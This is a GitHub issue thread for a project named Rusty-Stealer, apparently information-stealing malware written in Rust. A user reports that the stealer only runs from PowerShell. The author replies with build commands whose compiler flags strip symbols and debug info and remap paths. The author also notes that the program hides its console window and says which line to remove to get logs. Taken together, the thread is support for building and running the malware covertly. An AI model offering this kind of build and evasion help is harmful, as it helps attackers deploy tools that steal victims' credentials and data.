### ISSUE TITLE
why its only work when i use powershell

### ISSUE THREAD

**Issue by PotatoSUS** [0bishop/Rusty-Stealer#2]
for a some reason the stealer only worls when i execute in powershell, if i click to execute or execute on cmd it dont works

**Comment by 0bishop** [comment]
<img width="1315" alt="image" src="https://github.com/0bishop/Rusty-Stealer/assets/87420893/55723590-f37d-40a6-a603-c76ea3aeb576">

Everything work fine for me with this commands on Powershell and CMD:
```bash
powershell
$env:RUSTFLAGS = "-Zlocation-detail=none -Ctarget-cpu=native -Cdebuginfo=0 -Zstrip=symbols -Zstrip=debuginfo --remap-path-prefix  C:\Users\$env:USERNAME\.cargo\registry\src\=caca"
cargo build --release
```

I'm currently working and made this stealer on ssh.
This may can leads some mistakes.
I will try tonight from the server directly with graphical interface but this will not change anything, i'm sure.
Please build it using the commands in the [README.md](https://github.com/0bishop/Rusty-Stealer/blob/main/README.md)
And please note that the stealer is using a system to "Hide Terminal Window" from the graphical interface.
If you want some logs, compile with `cargo build` and remove this in the main.rs
```rs
global::utils::hide_console_window();
```
(line 66)
